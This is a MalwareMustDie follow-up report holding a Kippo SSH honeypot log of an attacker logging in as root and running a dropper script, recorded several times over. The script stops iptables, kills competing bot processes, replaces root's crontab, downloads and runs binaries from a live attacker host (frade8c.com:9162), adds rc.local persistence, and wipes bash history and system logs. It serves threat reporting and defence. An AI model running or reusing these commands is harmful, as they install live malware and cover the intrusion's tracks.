- #MalwareMustDie | Case: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
- #Follow-up report: still in the wild
- Warning: the log below contains live URLs
- #Reported log:
- 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] login attempt [root/password] succeeded
- 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] root authenticated with keyboard-interactive
- 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] starting service ssh-connection
- 2014-10-13 10:33:31-0400 [SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] got channel session request
- 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] channel open
- 2014-10-13 10:33:31-0400 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 61.174.50.134:40011 (x.x.x.x) [session: 551]
- 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] executing command "/etc/init.d/iptables stop
- echo "nameserver 8.8.8.8" >> /etc/resolv.conf
- echo "nameserver 8.8.4.4" >> /etc/resolv.conf
- apt-get -y install wget
- yum -y install wget
- chmod 7777 / etc
- killall -9 .IptabLes
- killall -9 nfsd4
- killall -9 profild.key
- cd /etc;rm -rf dir fake.cfg
- killall -9 nfsd
- killall -9 DDosl
- killall -9 lengchao32
- killall -9 b26
- killall -9 khelper
- killall -9 Bill
- killall -9 n26
- killall -9 007
- killall -9 codelove
- killall -9 32
- killall -9 m32
- killall -9 m64
- killall -9 64
- killall -9 83BOT
- killall -9 82BOT
- killall -9 dos64
- killall -9 dos32
- killall -9 new6
- killall -9 new4
- killall -9 node24
- killall -9 mimi
- killall -9 nodeJR-1
- killall -9 freeBSD
- killall -9 ksapdd
- killall -9 106
- killall -9 09
- killall -9 xsw
- killall -9 syslogd
- killall -9 skysapdd
- killall -9 cupsddd
- killall -9 ksapd
- killall -9 atddd
- killall -9 xfsdxd
- killall -9 sfewfesfs
- killall -9 gfhjrtfyhuf
- killall -9 rewgtf3er4t
- killall -9 fdsfsfvff
- killall -9 smarvtd
- killall -9 whitptabil
- killall -9 gdmorpen
- cd /etc;chattr -i 66
- cd /root; chmod 7777 / etc
- killall -9 minerd
- killall -9 syn
- killall -9 joudckfr
- killall -9 www
- killall -9 log
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .Mm2
- killall -9 acpid
- killall -9 m64
- killall -9 ./QQ
- killall -9 aabb
- killall -9 g3
- killall -9 S99local
- killall -9 3
- killall -9 pm
- killall -9 qweasd
- killall -9 tangtang
- killall -9 imap-login
- killall -9 xudp
- killall -9 sshpa
- killall -9 008
- killall -9 txma
- killall -9 mrdos64.b00
- killall -9 mrdos32.b00
- killall -9 kkpklp
- killall -9 kiilp
- killall -9 xin1
- killall -9 jibateng
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeop
- killall -9 .task1
- killall -9 .mimeop
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- cd /root;rm -rf dir nohup.out
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsddd.*
- cd /etc;rm -rf dir atddd.*
- cd /etc;rm -rf dir ksapdd.*
- cd /etc;rm -rf dir kysapdd.*
- cd /etc;rm -rf dir sksapdd.*
- cd /etc;rm -rf dir skysapdd.*
- cd /etc;rm -rf dir xfsdxd.*
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsdd.*
- cd /etc;rm -rf dir atdd.*
- cd /etc;rm -rf dir ksapd.*
- cd /etc;rm -rf dir kysapd.*
- cd /etc;rm -rf dir sksapd.*
- cd /etc;rm -rf dir skysapd.*
- cd /etc;rm -rf dir xfsdx.*
- cd /etc;rm -rf dir sfewfesfs
- cd /etc;rm -rf dir gfhjrtfyhuf
- cd /etc;rm -rf dir rewgtf3er4t
- cd /etc;rm -rf dir fdsfsfvff
- cd /etc;rm -rf dir smarvtd
- cd /etc;rm -rf dir whitptabil
- cd /etc;rm -rf dir gdmorpen
- cd /etc;rm -rf dir sfewfesfs.*
- cd /etc;rm -rf dir gfhjrtfyhuf.*
- cd /etc;rm -rf dir rewgtf3er4t.*
- cd /etc;rm -rf dir fdsfsfvff.*
- cd /etc;rm -rf dir smarvtd.*
- cd /etc;rm -rf dir whitptabil.*
- cd /etc;rm -rf dir gdmorpen.*
- cd /etc;rm -rf dir nhgbhhj.*
- cd /tmp;rm -rf dir 1.*
- cd /tmp;rm -rf dir 2.*
- cd /tmp;rm -rf dir 3.*
- cd /tmp;rm -rf dir 4.*
- cd /tmp;rm -rf dir 5.*
- cd /tmp;rm -rf dir jdhe
- cd /tmp;rm -rf dir jdhe.*
- cd /var/spool/cron; rm -rf dir root.*
- cd /var/spool/cron; rm -rf dir root
- cd /var/spool/cron/crontabs; rm -rf dir root.*
- cd /var/spool/cron/crontabs; rm -rf dir root
- cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
- cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
- yes|mv /tmp/root /var/spool/cron
- yes|mv /tmp/root /var/spool/cron/crontabs
- cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
- cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
- cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
- cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
- cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
- cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
- cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
- cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
- cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
- cd /etc;wget -c http://www.frade8c.com:9162/byv832
- cd /tmp;chmod 7777 jdhe
- cd /etc;chmod 7777 nhgbhhj
- cd /etc;chmod 7777 byv832
- cd /etc;chmod 7777 sfewfesfs
- cd /etc;chmod 7777 gfhjrtfyhuf
- cd /etc;chmod 7777 rewgtf3er4t
- cd /etc;chmod 7777 fdsfsfvff
- cd /etc;chmod 7777 smarvtd
- cd /etc;chmod 7777 whitptabil
- cd /etc;chmod 7777 gdmorpen
- cd /tmp;chmod 7777 nhgbhhj
- cd /tmp;chmod 7777 byv832
- cd /tmp;chmod 7777 sfewfesfs
- cd /tmp;chmod 7777 gfhjrtfyhuf
- cd /tmp;chmod 7777 rewgtf3er4t
- cd /tmp;chmod 7777 fdsfsfvff
- cd /tmp;chmod 7777 smarvtd
- cd /tmp;chmod 7777 whitptabil
- cd /tmp;chmod 7777 gdmorpen
- cd /tmp;./jdhe
- nohup /etc/sfewfesfs > /dev/null 2>&1&
- nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
- nohup /etc/rewgtf3er4t > /dev/null 2>&1&
- nohup /etc/fdsfsfvff > /dev/null 2>&1&
- nohup /etc/smarvtd > /dev/null 2>&1&
- nohup /etc/whitptabil > /dev/null 2>&1&
- nohup /etc/gdmorpen > /dev/null 2>&1&
- nohup /etc/nhgbhhj > /dev/null 2>&1&
- nohup /etc/byv832 > /dev/null 2>&1&
- nohup /tmp/sfewfesfs > /dev/null 2>&1&
- nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
- nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
- nohup /tmp/fdsfsfvff > /dev/null 2>&1&
- nohup /tmp/smarvtd > /dev/null 2>&1&
- nohup /tmp/whitptabil > /dev/null 2>&1&
- nohup /tmp/gdmorpen > /dev/null 2>&1&
- nohup /tmp/nhgbhhj > /dev/null 2>&1&
- nohup /tmp/byv832 > /dev/null 2>&1&
- echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
- echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
- echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
- echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
- echo "cd /tmp;./smarvtd" >> /etc/rc.local
- echo "cd /tmp;./whitptabil" >> /etc/rc.local
- echo "cd /tmp;./gdmorpen" >> /etc/rc.local
- echo "cd /etc;./sfewfesfs" >> /etc/rc.local
- echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
- echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
- echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
- echo "cd /etc;./smarvtd" >> /etc/rc.local
- echo "cd /etc;./whitptabil" >> /etc/rc.local
- echo "cd /etc;./gdmorpen" >> /etc/rc.local
- echo "unset MAILCHECK" >> /etc/profile
- cd /etc;chattr +i sfewfesfs
- rm -rf /root/.bash_history
- touch /root/.bash_history
- history -r
- cd /var/log > dmesg
- cd /var/log > auth.log
- cd /var/log > alternatives.log
- cd /var/log > boot.log
- cd /var/log > btmp
- cd /var/log > cron
- cd /var/log > cups
- cd /var/log > daemon.log
- cd /var/log > dpkg.log
- cd /var/log > faillog
- cd /var/log > kern.log
- cd /var/log > lastlog
- cd /var/log > maillog
- cd /var/log > user.log
- cd /var/log > Xorg.x.log
- cd /var/log > anaconda.log
- cd /var/log > yum.log
- cd /var/log > secure
- cd /var/log > wtmp
- cd /var/log > utmp
- cd /var/log > messages
- cd /var/log > spooler
- cd /var/log > sudolog
- cd /var/log > aculog
- cd /var/log > access-log
- cd /root > .bash_history
- history -c"
- 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] exec command: "/etc/init.d/iptables stop
- echo "nameserver 8.8.8.8" >> /etc/resolv.conf
- echo "nameserver 8.8.4.4" >> /etc/resolv.conf
- apt-get -y install wget
- yum -y install wget
- chmod 7777 / etc
- killall -9 .IptabLes
- killall -9 nfsd4
- killall -9 profild.key
- cd /etc;rm -rf dir fake.cfg
- killall -9 nfsd
- killall -9 DDosl
- killall -9 lengchao32
- killall -9 b26
- killall -9 khelper
- killall -9 Bill
- killall -9 n26
- killall -9 007
- killall -9 codelove
- killall -9 32
- killall -9 m32
- killall -9 m64
- killall -9 64
- killall -9 83BOT
- killall -9 82BOT
- killall -9 dos64
- killall -9 dos32
- killall -9 new6
- killall -9 new4
- killall -9 node24
- killall -9 mimi
- killall -9 nodeJR-1
- killall -9 freeBSD
- killall -9 ksapdd
- killall -9 106
- killall -9 09
- killall -9 xsw
- killall -9 syslogd
- killall -9 skysapdd
- killall -9 cupsddd
- killall -9 ksapd
- killall -9 atddd
- killall -9 xfsdxd
- killall -9 sfewfesfs
- killall -9 gfhjrtfyhuf
- killall -9 rewgtf3er4t
- killall -9 fdsfsfvff
- killall -9 smarvtd
- killall -9 whitptabil
- killall -9 gdmorpen
- cd /etc;chattr -i 66
- cd /root; chmod 7777 / etc
- killall -9 minerd
- killall -9 syn
- killall -9 joudckfr
- killall -9 www
- killall -9 log
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .Mm2
- killall -9 acpid
- killall -9 m64
- killall -9 ./QQ
- killall -9 aabb
- killall -9 g3
- killall -9 S99local
- killall -9 3
- killall -9 pm
- killall -9 qweasd
- killall -9 tangtang
- killall -9 imap-login
- killall -9 xudp
- killall -9 sshpa
- killall -9 008
- killall -9 txma
- killall -9 mrdos64.b00
- killall -9 mrdos32.b00
- killall -9 kkpklp
- killall -9 kiilp
- killall -9 xin1
- killall -9 jibateng
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeop
- killall -9 .task1
- killall -9 .mimeop
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- cd /root;rm -rf dir nohup.out
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsddd.*
- cd /etc;rm -rf dir atddd.*
- cd /etc;rm -rf dir ksapdd.*
- cd /etc;rm -rf dir kysapdd.*
- cd /etc;rm -rf dir sksapdd.*
- cd /etc;rm -rf dir skysapdd.*
- cd /etc;rm -rf dir xfsdxd.*
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsdd.*
- cd /etc;rm -rf dir atdd.*
- cd /etc;rm -rf dir ksapd.*
- cd /etc;rm -rf dir kysapd.*
- cd /etc;rm -rf dir sksapd.*
- cd /etc;rm -rf dir skysapd.*
- cd /etc;rm -rf dir xfsdx.*
- cd /etc;rm -rf dir sfewfesfs
- cd /etc;rm -rf dir gfhjrtfyhuf
- cd /etc;rm -rf dir rewgtf3er4t
- cd /etc;rm -rf dir fdsfsfvff
- cd /etc;rm -rf dir smarvtd
- cd /etc;rm -rf dir whitptabil
- cd /etc;rm -rf dir gdmorpen
- cd /etc;rm -rf dir sfewfesfs.*
- cd /etc;rm -rf dir gfhjrtfyhuf.*
- cd /etc;rm -rf dir rewgtf3er4t.*
- cd /etc;rm -rf dir fdsfsfvff.*
- cd /etc;rm -rf dir smarvtd.*
- cd /etc;rm -rf dir whitptabil.*
- cd /etc;rm -rf dir gdmorpen.*
- cd /etc;rm -rf dir nhgbhhj.*
- cd /tmp;rm -rf dir 1.*
- cd /tmp;rm -rf dir 2.*
- cd /tmp;rm -rf dir 3.*
- cd /tmp;rm -rf dir 4.*
- cd /tmp;rm -rf dir 5.*
- cd /tmp;rm -rf dir jdhe
- cd /tmp;rm -rf dir jdhe.*
- cd /var/spool/cron; rm -rf dir root.*
- cd /var/spool/cron; rm -rf dir root
- cd /var/spool/cron/crontabs; rm -rf dir root.*
- cd /var/spool/cron/crontabs; rm -rf dir root
- cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
- cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
- yes|mv /tmp/root /var/spool/cron
- yes|mv /tmp/root /var/spool/cron/crontabs
- cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
- cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
- cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
- cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
- cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
- cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
- cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
- cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
- cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
- cd /etc;wget -c http://www.frade8c.com:9162/byv832
- cd /tmp;chmod 7777 jdhe
- cd /etc;chmod 7777 nhgbhhj
- cd /etc;chmod 7777 byv832
- cd /etc;chmod 7777 sfewfesfs
- cd /etc;chmod 7777 gfhjrtfyhuf
- cd /etc;chmod 7777 rewgtf3er4t
- cd /etc;chmod 7777 fdsfsfvff
- cd /etc;chmod 7777 smarvtd
- cd /etc;chmod 7777 whitptabil
- cd /etc;chmod 7777 gdmorpen
- cd /tmp;chmod 7777 nhgbhhj
- cd /tmp;chmod 7777 byv832
- cd /tmp;chmod 7777 sfewfesfs
- cd /tmp;chmod 7777 gfhjrtfyhuf
- cd /tmp;chmod 7777 rewgtf3er4t
- cd /tmp;chmod 7777 fdsfsfvff
- cd /tmp;chmod 7777 smarvtd
- cd /tmp;chmod 7777 whitptabil
- cd /tmp;chmod 7777 gdmorpen
- cd /tmp;./jdhe
- nohup /etc/sfewfesfs > /dev/null 2>&1&
- nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
- nohup /etc/rewgtf3er4t > /dev/null 2>&1&
- nohup /etc/fdsfsfvff > /dev/null 2>&1&
- nohup /etc/smarvtd > /dev/null 2>&1&
- nohup /etc/whitptabil > /dev/null 2>&1&
- nohup /etc/gdmorpen > /dev/null 2>&1&
- nohup /etc/nhgbhhj > /dev/null 2>&1&
- nohup /etc/byv832 > /dev/null 2>&1&
- nohup /tmp/sfewfesfs > /dev/null 2>&1&
- nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
- nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
- nohup /tmp/fdsfsfvff > /dev/null 2>&1&
- nohup /tmp/smarvtd > /dev/null 2>&1&
- nohup /tmp/whitptabil > /dev/null 2>&1&
- nohup /tmp/gdmorpen > /dev/null 2>&1&
- nohup /tmp/nhgbhhj > /dev/null 2>&1&
- nohup /tmp/byv832 > /dev/null 2>&1&
- echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
- echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
- echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
- echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
- echo "cd /tmp;./smarvtd" >> /etc/rc.local
- echo "cd /tmp;./whitptabil" >> /etc/rc.local
- echo "cd /tmp;./gdmorpen" >> /etc/rc.local
- echo "cd /etc;./sfewfesfs" >> /etc/rc.local
- echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
- echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
- echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
- echo "cd /etc;./smarvtd" >> /etc/rc.local
- echo "cd /etc;./whitptabil" >> /etc/rc.local
- echo "cd /etc;./gdmorpen" >> /etc/rc.local
- echo "unset MAILCHECK" >> /etc/profile
- cd /etc;chattr +i sfewfesfs
- rm -rf /root/.bash_history
- touch /root/.bash_history
- history -r
- cd /var/log > dmesg
- cd /var/log > auth.log
- cd /var/log > alternatives.log
- cd /var/log > boot.log
- cd /var/log > btmp
- cd /var/log > cron
- cd /var/log > cups
- cd /var/log > daemon.log
- cd /var/log > dpkg.log
- cd /var/log > faillog
- cd /var/log > kern.log
- cd /var/log > lastlog
- cd /var/log > maillog
- cd /var/log > user.log
- cd /var/log > Xorg.x.log
- cd /var/log > anaconda.log
- cd /var/log > yum.log
- cd /var/log > secure
- cd /var/log > wtmp
- cd /var/log > utmp
- cd /var/log > messages
- cd /var/log > spooler
- cd /var/log > sudolog
- cd /var/log > aculog
- cd /var/log > access-log
- cd /root > .bash_history
- history -c"
- 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Opening TTY log: log/tty/20141013-103331-7357.log
- 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Running exec command "/etc/init.d/iptables stop
- echo "nameserver 8.8.8.8" >> /etc/resolv.conf
- echo "nameserver 8.8.4.4" >> /etc/resolv.conf
- apt-get -y install wget
- yum -y install wget
- chmod 7777 / etc
- killall -9 .IptabLes
- killall -9 nfsd4
- killall -9 profild.key
- cd /etc;rm -rf dir fake.cfg
- killall -9 nfsd
- killall -9 DDosl
- killall -9 lengchao32
- killall -9 b26
- killall -9 khelper
- killall -9 Bill
- killall -9 n26
- killall -9 007
- killall -9 codelove
- killall -9 32
- killall -9 m32
- killall -9 m64
- killall -9 64
- killall -9 83BOT
- killall -9 82BOT
- killall -9 dos64
- killall -9 dos32
- killall -9 new6
- killall -9 new4
- killall -9 node24
- killall -9 mimi
- killall -9 nodeJR-1
- killall -9 freeBSD
- killall -9 ksapdd
- killall -9 106
- killall -9 09
- killall -9 xsw
- killall -9 syslogd
- killall -9 skysapdd
- killall -9 cupsddd
- killall -9 ksapd
- killall -9 atddd
- killall -9 xfsdxd
- killall -9 sfewfesfs
- killall -9 gfhjrtfyhuf
- killall -9 rewgtf3er4t
- killall -9 fdsfsfvff
- killall -9 smarvtd
- killall -9 whitptabil
- killall -9 gdmorpen
- cd /etc;chattr -i 66
- cd /root; chmod 7777 / etc
- killall -9 minerd
- killall -9 syn
- killall -9 joudckfr
- killall -9 www
- killall -9 log
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .Mm2
- killall -9 acpid
- killall -9 m64
- killall -9 ./QQ
- killall -9 aabb
- killall -9 g3
- killall -9 S99local
- killall -9 3
- killall -9 pm
- killall -9 qweasd
- killall -9 tangtang
- killall -9 imap-login
- killall -9 xudp
- killall -9 sshpa
- killall -9 008
- killall -9 txma
- killall -9 mrdos64.b00
- killall -9 mrdos32.b00
- killall -9 kkpklp
- killall -9 kiilp
- killall -9 xin1
- killall -9 jibateng
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeop
- killall -9 .task1
- killall -9 .mimeop
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- cd /root;rm -rf dir nohup.out
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsddd.*
- cd /etc;rm -rf dir atddd.*
- cd /etc;rm -rf dir ksapdd.*
- cd /etc;rm -rf dir kysapdd.*
- cd /etc;rm -rf dir sksapdd.*
- cd /etc;rm -rf dir skysapdd.*
- cd /etc;rm -rf dir xfsdxd.*
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsdd.*
- cd /etc;rm -rf dir atdd.*
- cd /etc;rm -rf dir ksapd.*
- cd /etc;rm -rf dir kysapd.*
- cd /etc;rm -rf dir sksapd.*
- cd /etc;rm -rf dir skysapd.*
- cd /etc;rm -rf dir xfsdx.*
- cd /etc;rm -rf dir sfewfesfs
- cd /etc;rm -rf dir gfhjrtfyhuf
- cd /etc;rm -rf dir rewgtf3er4t
- cd /etc;rm -rf dir fdsfsfvff
- cd /etc;rm -rf dir smarvtd
- cd /etc;rm -rf dir whitptabil
- cd /etc;rm -rf dir gdmorpen
- cd /etc;rm -rf dir sfewfesfs.*
- cd /etc;rm -rf dir gfhjrtfyhuf.*
- cd /etc;rm -rf dir rewgtf3er4t.*
- cd /etc;rm -rf dir fdsfsfvff.*
- cd /etc;rm -rf dir smarvtd.*
- cd /etc;rm -rf dir whitptabil.*
- cd /etc;rm -rf dir gdmorpen.*
- cd /etc;rm -rf dir nhgbhhj.*
- cd /tmp;rm -rf dir 1.*
- cd /tmp;rm -rf dir 2.*
- cd /tmp;rm -rf dir 3.*
- cd /tmp;rm -rf dir 4.*
- cd /tmp;rm -rf dir 5.*
- cd /tmp;rm -rf dir jdhe
- cd /tmp;rm -rf dir jdhe.*
- cd /var/spool/cron; rm -rf dir root.*
- cd /var/spool/cron; rm -rf dir root
- cd /var/spool/cron/crontabs; rm -rf dir root.*
- cd /var/spool/cron/crontabs; rm -rf dir root
- cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
- cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
- yes|mv /tmp/root /var/spool/cron
- yes|mv /tmp/root /var/spool/cron/crontabs
- cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
- cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
- cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
- cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
- cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
- cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
- cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
- cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
- cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
- cd /etc;wget -c http://www.frade8c.com:9162/byv832
- cd /tmp;chmod 7777 jdhe
- cd /etc;chmod 7777 nhgbhhj
- cd /etc;chmod 7777 byv832
- cd /etc;chmod 7777 sfewfesfs
- cd /etc;chmod 7777 gfhjrtfyhuf
- cd /etc;chmod 7777 rewgtf3er4t
- cd /etc;chmod 7777 fdsfsfvff
- cd /etc;chmod 7777 smarvtd
- cd /etc;chmod 7777 whitptabil
- cd /etc;chmod 7777 gdmorpen
- cd /tmp;chmod 7777 nhgbhhj
- cd /tmp;chmod 7777 byv832
- cd /tmp;chmod 7777 sfewfesfs
- cd /tmp;chmod 7777 gfhjrtfyhuf
- cd /tmp;chmod 7777 rewgtf3er4t
- cd /tmp;chmod 7777 fdsfsfvff
- cd /tmp;chmod 7777 smarvtd
- cd /tmp;chmod 7777 whitptabil
- cd /tmp;chmod 7777 gdmorpen
- cd /tmp;./jdhe
- nohup /etc/sfewfesfs > /dev/null 2>&1&
- nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
- nohup /etc/rewgtf3er4t > /dev/null 2>&1&
- nohup /etc/fdsfsfvff > /dev/null 2>&1&
- nohup /etc/smarvtd > /dev/null 2>&1&
- nohup /etc/whitptabil > /dev/null 2>&1&
- nohup /etc/gdmorpen > /dev/null 2>&1&
- nohup /etc/nhgbhhj > /dev/null 2>&1&
- nohup /etc/byv832 > /dev/null 2>&1&
- nohup /tmp/sfewfesfs > /dev/null 2>&1&
- nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
- nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
- nohup /tmp/fdsfsfvff > /dev/null 2>&1&
- nohup /tmp/smarvtd > /dev/null 2>&1&
- nohup /tmp/whitptabil > /dev/null 2>&1&
- nohup /tmp/gdmorpen > /dev/null 2>&1&
- nohup /tmp/nhgbhhj > /dev/null 2>&1&
- nohup /tmp/byv832 > /dev/null 2>&1&
- echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
- echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
- echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
- echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
- echo "cd /tmp;./smarvtd" >> /etc/rc.local
- echo "cd /tmp;./whitptabil" >> /etc/rc.local
- echo "cd /tmp;./gdmorpen" >> /etc/rc.local
- echo "cd /etc;./sfewfesfs" >> /etc/rc.local
- echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
- echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
- echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
- echo "cd /etc;./smarvtd" >> /etc/rc.local
- echo "cd /etc;./whitptabil" >> /etc/rc.local
- echo "cd /etc;./gdmorpen" >> /etc/rc.local
- echo "unset MAILCHECK" >> /etc/profile
- cd /etc;chattr +i sfewfesfs
- rm -rf /root/.bash_history
- touch /root/.bash_history
- history -r
- cd /var/log > dmesg
- cd /var/log > auth.log
- cd /var/log > alternatives.log
- cd /var/log > boot.log
- cd /var/log > btmp
- cd /var/log > cron
- cd /var/log > cups
- cd /var/log > daemon.log
- cd /var/log > dpkg.log
- cd /var/log > faillog
- cd /var/log > kern.log
- cd /var/log > lastlog
- cd /var/log > maillog
- cd /var/log > user.log
- cd /var/log > Xorg.x.log
- cd /var/log > anaconda.log
- cd /var/log > yum.log
- cd /var/log > secure
- cd /var/log > wtmp
- cd /var/log > utmp
- cd /var/log > messages
- cd /var/log > spooler
- cd /var/log > sudolog
- cd /var/log > aculog
- cd /var/log > access-log
- cd /root > .bash_history
- history -c"
- 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] CMD: /etc/init.d/iptables stop
- echo "nameserver 8.8.8.8" >> /etc/resolv.conf
- echo "nameserver 8.8.4.4" >> /etc/resolv.conf
- apt-get -y install wget
- yum -y install wget
- chmod 7777 / etc
- killall -9 .IptabLes
- killall -9 nfsd4
- killall -9 profild.key
- cd /etc;rm -rf dir fake.cfg
- killall -9 nfsd
- killall -9 DDosl
- killall -9 lengchao32
- killall -9 b26
- killall -9 khelper
- killall -9 Bill
- killall -9 n26
- killall -9 007
- killall -9 codelove
- killall -9 32
- killall -9 m32
- killall -9 m64
- killall -9 64
- killall -9 83BOT
- killall -9 82BOT
- killall -9 dos64
- killall -9 dos32
- killall -9 new6
- killall -9 new4
- killall -9 node24
- killall -9 mimi
- killall -9 nodeJR-1
- killall -9 freeBSD
- killall -9 ksapdd
- killall -9 106
- killall -9 09
- killall -9 xsw
- killall -9 syslogd
- killall -9 skysapdd
- killall -9 cupsddd
- killall -9 ksapd
- killall -9 atddd
- killall -9 xfsdxd
- killall -9 sfewfesfs
- killall -9 gfhjrtfyhuf
- killall -9 rewgtf3er4t
- killall -9 fdsfsfvff
- killall -9 smarvtd
- killall -9 whitptabil
- killall -9 gdmorpen
- cd /etc;chattr -i 66
- cd /root; chmod 7777 / etc
- killall -9 minerd
- killall -9 syn
- killall -9 joudckfr
- killall -9 www
- killall -9 log
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .Mm2
- killall -9 acpid
- killall -9 m64
- killall -9 ./QQ
- killall -9 aabb
- killall -9 g3
- killall -9 S99local
- killall -9 3
- killall -9 pm
- killall -9 qweasd
- killall -9 tangtang
- killall -9 imap-login
- killall -9 xudp
- killall -9 sshpa
- killall -9 008
- killall -9 txma
- killall -9 mrdos64.b00
- killall -9 mrdos32.b00
- killall -9 kkpklp
- killall -9 kiilp
- killall -9 xin1
- killall -9 jibateng
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeop
- killall -9 .task1
- killall -9 .mimeop
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
